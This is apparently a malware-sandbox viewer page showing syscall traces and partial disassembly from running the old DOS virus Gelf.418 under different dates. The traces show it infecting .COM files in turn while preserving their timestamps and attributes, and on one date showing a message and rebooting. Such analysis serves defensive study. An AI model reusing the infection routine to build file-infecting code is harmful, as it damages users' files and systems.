Sample viewer

vx.netlux.org/Virus.DOS.Gelf.418

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:08:01.337089097Z	42	PC: 12a4f \| Get date 0x12a4f: cmp dx, 0x101 0x12a53: jne 0x12a62 0x12a55: mov ah, 9 0x12a57: mov dx, 0x282 0x12a5a: int 0x21 0x12a5c: mov ah, 1 0x12a5e: int 0x21 0x12a60: int 0x19 0x12a62: call 0x12a7c 0x12a65: jmp 0x12a8f 0x12a67: nop 0x12a68: add byte ptr [bx + si], al 0x12a6a: call 0x12a7c 0x12a6d: mov ah, 0x40 0x12a6f: mov cx, 0x1a2 0x12a72: lea dx, word ptr [bp + 0x103] 0x12a76: int 0x21 0x12a78: call 0x12a7c 0x12a7b: ret 0x12a7c: mov bx, word ptr ds:[bp + 0x128]
2018-12-17T23:08:01.34142129Z	26	PC: 12aa0 \| Set disk transfer address
2018-12-17T23:08:01.343180497Z	71	PC: 12aa9 \| Get current directory
2018-12-17T23:08:01.346319587Z	78	PC: 12ab4 \| Find first file
2018-12-17T23:08:01.356984223Z	67	PC: 12ac5 \| Get or set file attributes
2018-12-17T23:08:01.375201396Z	61	PC: 12ad3 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T23:08:01.382705501Z	63	PC: 12ae1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:08:01.390015301Z	66	PC: 12af6 \| Move file pointer
2018-12-17T23:08:01.394589609Z	44	PC: 12b04 \| Get time 0x12b04: add dl, dh 0x12b06: cmp bx, 0 0x12b09: je 0x12b00 0x12b0b: mov word ptr ds:[bp + 0x128], bx 0x12b10: call 0x22a6a 0x12b13: mov ax, 0x4200 0x12b16: mov cx, 0 0x12b19: mov dx, 0 0x12b1c: int 0x21 0x12b1e: jb 0x12b2b 0x12b20: mov ah, 0x40 0x12b22: mov cx, 3 0x12b25: lea dx, word ptr [bp + 0x27f] 0x12b29: int 0x21 0x12b2b: mov ax, 0x4301 0x12b2e: mov cx, word ptr ds:[bp + 0x2ba] 0x12b33: lea dx, word ptr [bp + 0x2c3] 0x12b37: int 0x21 0x12b39: mov ax, 0x5701 0x12b3c: mov cx, word ptr ds:[bp + 0x2bb]
2018-12-17T23:08:01.397248828Z	64	PC: 12a78 \| Write file or device (Write 418 bytes on handle 5)
2018-12-17T23:08:01.407106417Z	66	PC: 12b1e \| Move file pointer
2018-12-17T23:08:01.409605203Z	64	PC: 12b2b \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:08:01.416695241Z	67	PC: 12b39 \| Get or set file attributes
2018-12-17T23:08:01.421821507Z	87	PC: 12b48 \| Get or set file date and time
2018-12-17T23:08:01.425092175Z	62	PC: 12b4c \| Close file
2018-12-17T23:08:01.431635964Z	79	PC: 12ab4 \| Find next file
2018-12-17T23:08:01.434039933Z	67	PC: 12ac5 \| Get or set file attributes
2018-12-17T23:08:01.444045841Z	61	PC: 12ad3 \| Open file (Filename = 'PRINT.COM')
2018-12-17T23:08:01.451843117Z	63	PC: 12ae1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:08:01.459261091Z	66	PC: 12af6 \| Move file pointer
2018-12-17T23:08:01.461933263Z	44	PC: 12b04 \| Get time 0x12b04: add dl, dh 0x12b06: cmp bx, 0 0x12b09: je 0x12b00 0x12b0b: mov word ptr ds:[bp + 0x128], bx 0x12b10: call 0x22a6a 0x12b13: mov ax, 0x4200 0x12b16: mov cx, 0 0x12b19: mov dx, 0 0x12b1c: int 0x21 0x12b1e: jb 0x12b2b 0x12b20: mov ah, 0x40 0x12b22: mov cx, 3 0x12b25: lea dx, word ptr [bp + 0x27f] 0x12b29: int 0x21 0x12b2b: mov ax, 0x4301 0x12b2e: mov cx, word ptr ds:[bp + 0x2ba] 0x12b33: lea dx, word ptr [bp + 0x2c3] 0x12b37: int 0x21 0x12b39: mov ax, 0x5701 0x12b3c: mov cx, word ptr ds:[bp + 0x2bb]
2018-12-17T23:08:01.464738085Z	64	PC: 12a78 \| Write file or device (Write 418 bytes on handle 5)
2018-12-17T23:08:01.468141152Z	66	PC: 12b1e \| Move file pointer
2018-12-17T23:08:01.470327161Z	64	PC: 12b2b \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:08:01.474230118Z	67	PC: 12b39 \| Get or set file attributes
2018-12-17T23:08:01.482547591Z	87	PC: 12b48 \| Get or set file date and time
2018-12-17T23:08:01.484397348Z	62	PC: 12b4c \| Close file
2018-12-17T23:08:01.493139842Z	79	PC: 12ab4 \| Find next file
2018-12-17T23:08:01.496056283Z	67	PC: 12ac5 \| Get or set file attributes
2018-12-17T23:08:01.506487291Z	61	PC: 12ad3 \| Open file (Filename = 'HELLO.COM')
2018-12-17T23:08:01.514847294Z	63	PC: 12ae1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:08:01.521864424Z	66	PC: 12af6 \| Move file pointer
2018-12-17T23:08:01.523575591Z	44	PC: 12b04 \| Get time 0x12b04: add dl, dh 0x12b06: cmp bx, 0 0x12b09: je 0x12b00 0x12b0b: mov word ptr ds:[bp + 0x128], bx 0x12b10: call 0x22a6a 0x12b13: mov ax, 0x4200 0x12b16: mov cx, 0 0x12b19: mov dx, 0 0x12b1c: int 0x21 0x12b1e: jb 0x12b2b 0x12b20: mov ah, 0x40 0x12b22: mov cx, 3 0x12b25: lea dx, word ptr [bp + 0x27f] 0x12b29: int 0x21 0x12b2b: mov ax, 0x4301 0x12b2e: mov cx, word ptr ds:[bp + 0x2ba] 0x12b33: lea dx, word ptr [bp + 0x2c3] 0x12b37: int 0x21 0x12b39: mov ax, 0x5701 0x12b3c: mov cx, word ptr ds:[bp + 0x2bb]
2018-12-17T23:08:01.527486873Z	64	PC: 12a78 \| Write file or device (Write 418 bytes on handle 5)
2018-12-17T23:08:01.530819446Z	66	PC: 12b1e \| Move file pointer
2018-12-17T23:08:01.532460662Z	64	PC: 12b2b \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:08:01.536106304Z	67	PC: 12b39 \| Get or set file attributes
2018-12-17T23:08:01.541731178Z	87	PC: 12b48 \| Get or set file date and time
2018-12-17T23:08:01.543970006Z	62	PC: 12b4c \| Close file
2018-12-17T23:08:01.554264816Z	79	PC: 12ab4 \| Find next file
2018-12-17T23:08:01.557834837Z	67	PC: 12ac5 \| Get or set file attributes
2018-12-17T23:08:01.569098318Z	61	PC: 12ad3 \| Open file (Filename = 'PHANG.COM')
2018-12-17T23:08:01.578349338Z	63	PC: 12ae1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:08:01.586293069Z	66	PC: 12af6 \| Move file pointer
2018-12-17T23:08:01.588417933Z	44	PC: 12b04 \| Get time 0x12b04: add dl, dh 0x12b06: cmp bx, 0 0x12b09: je 0x12b00 0x12b0b: mov word ptr ds:[bp + 0x128], bx 0x12b10: call 0x22a6a 0x12b13: mov ax, 0x4200 0x12b16: mov cx, 0 0x12b19: mov dx, 0 0x12b1c: int 0x21 0x12b1e: jb 0x12b2b 0x12b20: mov ah, 0x40 0x12b22: mov cx, 3 0x12b25: lea dx, word ptr [bp + 0x27f] 0x12b29: int 0x21 0x12b2b: mov ax, 0x4301 0x12b2e: mov cx, word ptr ds:[bp + 0x2ba] 0x12b33: lea dx, word ptr [bp + 0x2c3] 0x12b37: int 0x21 0x12b39: mov ax, 0x5701 0x12b3c: mov cx, word ptr ds:[bp + 0x2bb]
2018-12-17T23:08:01.591429284Z	64	PC: 12a78 \| Write file or device (Write 418 bytes on handle 5)
2018-12-17T23:08:01.595150057Z	66	PC: 12b1e \| Move file pointer
2018-12-17T23:08:01.596799958Z	64	PC: 12b2b \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:08:01.600107816Z	67	PC: 12b39 \| Get or set file attributes
2018-12-17T23:08:01.606738079Z	87	PC: 12b48 \| Get or set file date and time
2018-12-17T23:08:01.609074781Z	62	PC: 12b4c \| Close file
2018-12-17T23:08:01.62254467Z	79	PC: 12ab4 \| Find next file
2018-12-17T23:08:01.626905578Z	67	PC: 12ac5 \| Get or set file attributes
2018-12-17T23:08:01.638080492Z	61	PC: 12ad3 \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:08:01.645476174Z	63	PC: 12ae1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:08:01.653173783Z	66	PC: 12af6 \| Move file pointer
2018-12-17T23:08:01.655487492Z	44	PC: 12b04 \| Get time 0x12b04: add dl, dh 0x12b06: cmp bx, 0 0x12b09: je 0x12b00 0x12b0b: mov word ptr ds:[bp + 0x128], bx 0x12b10: call 0x22a6a 0x12b13: mov ax, 0x4200 0x12b16: mov cx, 0 0x12b19: mov dx, 0 0x12b1c: int 0x21 0x12b1e: jb 0x12b2b 0x12b20: mov ah, 0x40 0x12b22: mov cx, 3 0x12b25: lea dx, word ptr [bp + 0x27f] 0x12b29: int 0x21 0x12b2b: mov ax, 0x4301 0x12b2e: mov cx, word ptr ds:[bp + 0x2ba] 0x12b33: lea dx, word ptr [bp + 0x2c3] 0x12b37: int 0x21 0x12b39: mov ax, 0x5701 0x12b3c: mov cx, word ptr ds:[bp + 0x2bb]
2018-12-17T23:08:01.658266886Z	64	PC: 12a78 \| Write file or device (Write 418 bytes on handle 5)
2018-12-17T23:08:01.661778537Z	66	PC: 12b1e \| Move file pointer
2018-12-17T23:08:01.664444458Z	64	PC: 12b2b \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:08:01.667598306Z	67	PC: 12b39 \| Get or set file attributes
2018-12-17T23:08:01.672905101Z	87	PC: 12b48 \| Get or set file date and time
2018-12-17T23:08:01.675534584Z	62	PC: 12b4c \| Close file
2018-12-17T23:08:01.683255116Z	79	PC: 12ab4 \| Find next file
2018-12-17T23:08:01.686990217Z	67	PC: 12ac5 \| Get or set file attributes
2018-12-17T23:08:01.698710898Z	61	PC: 12ad3 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T23:08:01.706015508Z	63	PC: 12ae1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:08:01.713018472Z	66	PC: 12af6 \| Move file pointer
2018-12-17T23:08:01.715698569Z	44	PC: 12b04 \| Get time 0x12b04: add dl, dh 0x12b06: cmp bx, 0 0x12b09: je 0x12b00 0x12b0b: mov word ptr ds:[bp + 0x128], bx 0x12b10: call 0x22a6a 0x12b13: mov ax, 0x4200 0x12b16: mov cx, 0 0x12b19: mov dx, 0 0x12b1c: int 0x21 0x12b1e: jb 0x12b2b 0x12b20: mov ah, 0x40 0x12b22: mov cx, 3 0x12b25: lea dx, word ptr [bp + 0x27f] 0x12b29: int 0x21 0x12b2b: mov ax, 0x4301 0x12b2e: mov cx, word ptr ds:[bp + 0x2ba] 0x12b33: lea dx, word ptr [bp + 0x2c3] 0x12b37: int 0x21 0x12b39: mov ax, 0x5701 0x12b3c: mov cx, word ptr ds:[bp + 0x2bb]
2018-12-17T23:08:01.718868537Z	64	PC: 12a78 \| Write file or device (Write 418 bytes on handle 5)
2018-12-17T23:08:01.727944788Z	66	PC: 12b1e \| Move file pointer
2018-12-17T23:08:01.730497527Z	64	PC: 12b2b \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:08:01.738153958Z	67	PC: 12b39 \| Get or set file attributes
2018-12-17T23:08:01.74343797Z	87	PC: 12b48 \| Get or set file date and time
2018-12-17T23:08:01.745376193Z	62	PC: 12b4c \| Close file
2018-12-17T23:08:01.755489904Z	79	PC: 12ab4 \| Find next file
2018-12-17T23:08:01.758645656Z	67	PC: 12ac5 \| Get or set file attributes
2018-12-17T23:08:01.769214Z	61	PC: 12ad3 \| Open file (Filename = 'PAH.COM')
2018-12-17T23:08:01.77751315Z	63	PC: 12ae1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:08:01.784602295Z	66	PC: 12af6 \| Move file pointer
2018-12-17T23:08:01.786417437Z	44	PC: 12b04 \| Get time 0x12b04: add dl, dh 0x12b06: cmp bx, 0 0x12b09: je 0x12b00 0x12b0b: mov word ptr ds:[bp + 0x128], bx 0x12b10: call 0x22a6a 0x12b13: mov ax, 0x4200 0x12b16: mov cx, 0 0x12b19: mov dx, 0 0x12b1c: int 0x21 0x12b1e: jb 0x12b2b 0x12b20: mov ah, 0x40 0x12b22: mov cx, 3 0x12b25: lea dx, word ptr [bp + 0x27f] 0x12b29: int 0x21 0x12b2b: mov ax, 0x4301 0x12b2e: mov cx, word ptr ds:[bp + 0x2ba] 0x12b33: lea dx, word ptr [bp + 0x2c3] 0x12b37: int 0x21 0x12b39: mov ax, 0x5701 0x12b3c: mov cx, word ptr ds:[bp + 0x2bb]
2018-12-17T23:08:01.790016602Z	64	PC: 12a78 \| Write file or device (Write 418 bytes on handle 5)
2018-12-17T23:08:01.793287972Z	66	PC: 12b1e \| Move file pointer
2018-12-17T23:08:01.795055484Z	64	PC: 12b2b \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:08:01.798944044Z	67	PC: 12b39 \| Get or set file attributes
2018-12-17T23:08:01.804313897Z	87	PC: 12b48 \| Get or set file date and time
2018-12-17T23:08:01.806234417Z	62	PC: 12b4c \| Close file
2018-12-17T23:08:01.814467743Z	79	PC: 12ab4 \| Find next file
2018-12-17T23:08:01.818667878Z	67	PC: 12ac5 \| Get or set file attributes
2018-12-17T23:08:01.829594927Z	61	PC: 12ad3 \| Open file (Filename = 'TEST.COM')
2018-12-17T23:08:01.836613469Z	63	PC: 12ae1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:08:01.840227102Z	67	PC: 12b39 \| Get or set file attributes
2018-12-17T23:08:01.845277475Z	87	PC: 12b48 \| Get or set file date and time
2018-12-17T23:08:01.847033356Z	62	PC: 12b4c \| Close file
2018-12-17T23:08:01.855047399Z	79	PC: 12ab4 \| Find next file
2018-12-17T23:08:01.858366137Z	59	PC: 12b64 \| Change current directory
2018-12-17T23:08:01.863029152Z	59	PC: 12b70 \| Change current directory
2018-12-17T23:08:01.873528648Z	26	PC: 12b58 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16056,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:45:14.270711715Z	42	PC: 12a4f \| Get date 0x12a4f: cmp dx, 0x101 0x12a53: jne 0x12a62 0x12a55: mov ah, 9 0x12a57: mov dx, 0x282 0x12a5a: int 0x21 0x12a5c: mov ah, 1 0x12a5e: int 0x21 0x12a60: int 0x19 0x12a62: call 0x12a7c 0x12a65: jmp 0x12a8f 0x12a67: nop 0x12a68: add byte ptr [bx + si], al 0x12a6a: call 0x12a7c 0x12a6d: mov ah, 0x40 0x12a6f: mov cx, 0x1a2 0x12a72: lea dx, word ptr [bp + 0x103] 0x12a76: int 0x21 0x12a78: call 0x12a7c 0x12a7b: ret 0x12a7c: mov bx, word ptr ds:[bp + 0x128]
2018-12-25T12:45:14.273340241Z	9	PC: 12a5c \| Display string (String= '[Gelf] Virus written by EXE-Gency!')
2018-12-25T12:45:14.275749104Z	1	PC: 12a60 \| Character input

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16056,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:45:14.682340265Z	42	PC: 12a4f \| Get date 0x12a4f: cmp dx, 0x101 0x12a53: jne 0x12a62 0x12a55: mov ah, 9 0x12a57: mov dx, 0x282 0x12a5a: int 0x21 0x12a5c: mov ah, 1 0x12a5e: int 0x21 0x12a60: int 0x19 0x12a62: call 0x12a7c 0x12a65: jmp 0x12a8f 0x12a67: nop 0x12a68: add byte ptr [bx + si], al 0x12a6a: call 0x12a7c 0x12a6d: mov ah, 0x40 0x12a6f: mov cx, 0x1a2 0x12a72: lea dx, word ptr [bp + 0x103] 0x12a76: int 0x21 0x12a78: call 0x12a7c 0x12a7b: ret 0x12a7c: mov bx, word ptr ds:[bp + 0x128]
2018-12-25T12:45:14.685481584Z	26	PC: 12aa0 \| Set disk transfer address
2018-12-25T12:45:14.686879094Z	71	PC: 12aa9 \| Get current directory
2018-12-25T12:45:14.689816596Z	78	PC: 12ab4 \| Find first file
2018-12-25T12:45:14.695919034Z	67	PC: 12ac5 \| Get or set file attributes
2018-12-25T12:45:14.714010084Z	61	PC: 12ad3 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.724839114Z	63	PC: 12ae1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:45:14.731243978Z	66	PC: 12af6 \| Move file pointer
2018-12-25T12:45:14.733393237Z	44	PC: 12b04 \| Get time 0x12b04: add dl, dh 0x12b06: cmp bx, 0 0x12b09: je 0x12b00 0x12b0b: mov word ptr ds:[bp + 0x128], bx 0x12b10: call 0x22a6a 0x12b13: mov ax, 0x4200 0x12b16: mov cx, 0 0x12b19: mov dx, 0 0x12b1c: int 0x21 0x12b1e: jb 0x12b2b 0x12b20: mov ah, 0x40 0x12b22: mov cx, 3 0x12b25: lea dx, word ptr [bp + 0x27f] 0x12b29: int 0x21 0x12b2b: mov ax, 0x4301 0x12b2e: mov cx, word ptr ds:[bp + 0x2ba] 0x12b33: lea dx, word ptr [bp + 0x2c3] 0x12b37: int 0x21 0x12b39: mov ax, 0x5701 0x12b3c: mov cx, word ptr ds:[bp + 0x2bb]
2018-12-25T12:45:14.7362583Z	64	PC: 12a78 \| Write file or device (Write 418 bytes on handle 5)
2018-12-25T12:45:14.744066077Z	66	PC: 12b1e \| Move file pointer
2018-12-25T12:45:14.745972668Z	64	PC: 12b2b \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:14.752221276Z	67	PC: 12b39 \| Get or set file attributes
2018-12-25T12:45:14.756695064Z	87	PC: 12b48 \| Get or set file date and time
2018-12-25T12:45:14.758851875Z	62	PC: 12b4c \| Close file
2018-12-25T12:45:14.766354434Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:14.768913455Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:14.779593804Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:14.78609715Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:14.792727951Z	66	PC: 12af6 \| Move file pointer (See above)
2018-12-25T12:45:14.795480154Z	44	PC: 12b04 \| Get time (See above)
2018-12-25T12:45:14.798191801Z	64	PC: 12a78 \| Write file or device (See above)
2018-12-25T12:45:14.8012019Z	66	PC: 12b1e \| Move file pointer (See above)
2018-12-25T12:45:14.803479439Z	64	PC: 12b2b \| Write file or device (See above)
2018-12-25T12:45:14.80630465Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:14.811197034Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:14.813731197Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:14.831702736Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:14.834380826Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:14.845901656Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:14.852685358Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:14.859334035Z	66	PC: 12af6 \| Move file pointer (See above)
2018-12-25T12:45:14.860875588Z	44	PC: 12b04 \| Get time (See above)
2018-12-25T12:45:14.863758956Z	64	PC: 12a78 \| Write file or device (See above)
2018-12-25T12:45:14.866759812Z	66	PC: 12b1e \| Move file pointer (See above)
2018-12-25T12:45:14.868968357Z	64	PC: 12b2b \| Write file or device (See above)
2018-12-25T12:45:14.871885198Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:14.876449176Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:14.878026464Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:14.885982425Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:14.888496301Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:14.898055081Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:14.904884476Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:14.911003204Z	66	PC: 12af6 \| Move file pointer (See above)
2018-12-25T12:45:14.912321952Z	44	PC: 12b04 \| Get time (See above)
2018-12-25T12:45:14.915170833Z	64	PC: 12a78 \| Write file or device (See above)
2018-12-25T12:45:14.917818154Z	66	PC: 12b1e \| Move file pointer (See above)
2018-12-25T12:45:14.919073121Z	64	PC: 12b2b \| Write file or device (See above)
2018-12-25T12:45:14.922813474Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:14.927954209Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:14.929400974Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:14.937076742Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:14.93954021Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:14.94905777Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:14.955972768Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:14.962613092Z	66	PC: 12af6 \| Move file pointer (See above)
2018-12-25T12:45:14.963831391Z	44	PC: 12b04 \| Get time (See above)
2018-12-25T12:45:14.96658814Z	64	PC: 12a78 \| Write file or device (See above)
2018-12-25T12:45:14.969270161Z	66	PC: 12b1e \| Move file pointer (See above)
2018-12-25T12:45:14.970591378Z	64	PC: 12b2b \| Write file or device (See above)
2018-12-25T12:45:14.973584737Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:14.978018827Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:14.979619949Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:14.987134162Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:14.989576071Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:15.002181071Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:15.009314483Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:15.015536184Z	66	PC: 12af6 \| Move file pointer (See above)
2018-12-25T12:45:15.01674608Z	44	PC: 12b04 \| Get time (See above)
2018-12-25T12:45:15.019304305Z	64	PC: 12a78 \| Write file or device (See above)
2018-12-25T12:45:15.027613394Z	66	PC: 12b1e \| Move file pointer (See above)
2018-12-25T12:45:15.028775091Z	64	PC: 12b2b \| Write file or device (See above)
2018-12-25T12:45:15.035722476Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:15.040222263Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:15.041655403Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:15.04944905Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:15.051135129Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:15.057252351Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:15.061734117Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:15.065553954Z	66	PC: 12af6 \| Move file pointer (See above)
2018-12-25T12:45:15.066476567Z	44	PC: 12b04 \| Get time (See above)
2018-12-25T12:45:15.068442509Z	64	PC: 12a78 \| Write file or device (See above)
2018-12-25T12:45:15.070354149Z	66	PC: 12b1e \| Move file pointer (See above)
2018-12-25T12:45:15.071344454Z	64	PC: 12b2b \| Write file or device (See above)
2018-12-25T12:45:15.073691468Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:15.078137261Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:15.079315968Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:15.086697337Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:15.089120275Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:15.098721635Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:15.110821155Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:15.117253615Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:15.122450574Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:15.124925941Z	62	PC: 12b4c \| Close file (See above)
2018-12-25T12:45:15.131903706Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:15.134163508Z	59	PC: 12b64 \| Change current directory
2018-12-25T12:45:15.138329915Z	59	PC: 12b70 \| Change current directory
2018-12-25T12:45:15.142860235Z	26	PC: 12b58 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16056,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:45:14.663575221Z	42	PC: 12a4f \| Get date 0x12a4f: cmp dx, 0x101 0x12a53: jne 0x12a62 0x12a55: mov ah, 9 0x12a57: mov dx, 0x282 0x12a5a: int 0x21 0x12a5c: mov ah, 1 0x12a5e: int 0x21 0x12a60: int 0x19 0x12a62: call 0x12a7c 0x12a65: jmp 0x12a8f 0x12a67: nop 0x12a68: add byte ptr [bx + si], al 0x12a6a: call 0x12a7c 0x12a6d: mov ah, 0x40 0x12a6f: mov cx, 0x1a2 0x12a72: lea dx, word ptr [bp + 0x103] 0x12a76: int 0x21 0x12a78: call 0x12a7c 0x12a7b: ret 0x12a7c: mov bx, word ptr ds:[bp + 0x128]
2018-12-25T12:45:14.666068151Z	9	PC: 12a5c \| Display string (String= '[Gelf] Virus written by EXE-Gency!')
2018-12-25T12:45:14.669285413Z	1	PC: 12a60 \| Character input

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16056,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:45:14.671087654Z	42	PC: 12a4f \| Get date 0x12a4f: cmp dx, 0x101 0x12a53: jne 0x12a62 0x12a55: mov ah, 9 0x12a57: mov dx, 0x282 0x12a5a: int 0x21 0x12a5c: mov ah, 1 0x12a5e: int 0x21 0x12a60: int 0x19 0x12a62: call 0x12a7c 0x12a65: jmp 0x12a8f 0x12a67: nop 0x12a68: add byte ptr [bx + si], al 0x12a6a: call 0x12a7c 0x12a6d: mov ah, 0x40 0x12a6f: mov cx, 0x1a2 0x12a72: lea dx, word ptr [bp + 0x103] 0x12a76: int 0x21 0x12a78: call 0x12a7c 0x12a7b: ret 0x12a7c: mov bx, word ptr ds:[bp + 0x128]
2018-12-25T12:45:14.67388078Z	26	PC: 12aa0 \| Set disk transfer address
2018-12-25T12:45:14.674989657Z	71	PC: 12aa9 \| Get current directory
2018-12-25T12:45:14.67793344Z	78	PC: 12ab4 \| Find first file
2018-12-25T12:45:14.684465298Z	67	PC: 12ac5 \| Get or set file attributes
2018-12-25T12:45:14.703014436Z	61	PC: 12ad3 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.709824003Z	63	PC: 12ae1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:45:14.716609882Z	66	PC: 12af6 \| Move file pointer
2018-12-25T12:45:14.717913874Z	44	PC: 12b04 \| Get time 0x12b04: add dl, dh 0x12b06: cmp bx, 0 0x12b09: je 0x12b00 0x12b0b: mov word ptr ds:[bp + 0x128], bx 0x12b10: call 0x22a6a 0x12b13: mov ax, 0x4200 0x12b16: mov cx, 0 0x12b19: mov dx, 0 0x12b1c: int 0x21 0x12b1e: jb 0x12b2b 0x12b20: mov ah, 0x40 0x12b22: mov cx, 3 0x12b25: lea dx, word ptr [bp + 0x27f] 0x12b29: int 0x21 0x12b2b: mov ax, 0x4301 0x12b2e: mov cx, word ptr ds:[bp + 0x2ba] 0x12b33: lea dx, word ptr [bp + 0x2c3] 0x12b37: int 0x21 0x12b39: mov ax, 0x5701 0x12b3c: mov cx, word ptr ds:[bp + 0x2bb]
2018-12-25T12:45:14.720074375Z	64	PC: 12a78 \| Write file or device (Write 418 bytes on handle 5)
2018-12-25T12:45:14.728799789Z	66	PC: 12b1e \| Move file pointer
2018-12-25T12:45:14.730045714Z	64	PC: 12b2b \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:14.73636318Z	67	PC: 12b39 \| Get or set file attributes
2018-12-25T12:45:14.740994235Z	87	PC: 12b48 \| Get or set file date and time
2018-12-25T12:45:14.742805259Z	62	PC: 12b4c \| Close file
2018-12-25T12:45:14.750459408Z	79	PC: 12ab4 \| Find next file (See above)
2018-12-25T12:45:14.753094451Z	67	PC: 12ac5 \| Get or set file attributes (See above)
2018-12-25T12:45:14.762913201Z	61	PC: 12ad3 \| Open file (See above)
2018-12-25T12:45:14.769234337Z	63	PC: 12ae1 \| Read file or device (See above)
2018-12-25T12:45:14.775270023Z	66	PC: 12af6 \| Move file pointer (See above)
2018-12-25T12:45:14.777032955Z	44	PC: 12b04 \| Get time (See above)
2018-12-25T12:45:14.779095465Z	64	PC: 12a78 \| Write file or device (See above)
2018-12-25T12:45:14.78171806Z	66	PC: 12b1e \| Move file pointer (See above)
2018-12-25T12:45:14.78388931Z	64	PC: 12b2b \| Write file or device (See above)
2018-12-25T12:45:14.78703825Z	67	PC: 12b39 \| Get or set file attributes (See above)
2018-12-25T12:45:14.791556504Z	87	PC: 12b48 \| Get or set file date and time (See above)
2018-12-25T12:45:14.794017161Z	62	PC: 12b4c \| Close file (See above)
